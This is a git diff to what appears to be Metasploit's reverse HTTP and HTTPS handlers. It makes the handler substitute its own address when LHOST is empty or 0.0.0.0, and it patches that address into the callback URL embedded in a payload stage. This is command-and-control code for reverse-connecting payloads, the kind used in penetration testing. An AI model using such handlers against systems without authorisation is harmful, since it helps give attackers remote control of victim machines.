diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 9f3c35db1e..0f099174e9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -123,13 +123,21 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") + + lhost = datastore['LHOST'] + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + if lhost.empty? or lhost == '0.0.0.0' + lhost = Rex::Socket.source_address(cli.peerhost) + end + # Process the requested resource. case req.relative_resource when /^\/INITJM/ - print_line("java: #{req.relative_resource}") + print_line("Java: #{req.relative_resource}") conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" print_line "URL: #{url.inspect}" blob = "" @@ -178,7 +186,7 @@ protected conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) i = blob.index("https://" + ("X" * 256)) if i - url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" blob[i, url.length] = url end print_status("Patched URL at offset #{i}...") diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 605eb759d5..4bf1f20d6d 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -124,11 +124,18 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") + lhost = datastore['LHOST'] + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + if lhost.empty? or lhost == '0.0.0.0' + lhost = Rex::Socket.source_address(cli.peerhost) + end + # Process the requested resource. case req.relative_resource when /^\/INITJM/ conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" #$stdout.puts "URL: #{url.inspect}" blob = "" @@ -176,7 +183,7 @@ protected conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) i = blob.index("https://" + ("X" * 256)) if i - url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" blob[i, url.length] = url end print_status("Patched URL at offset #{i}...")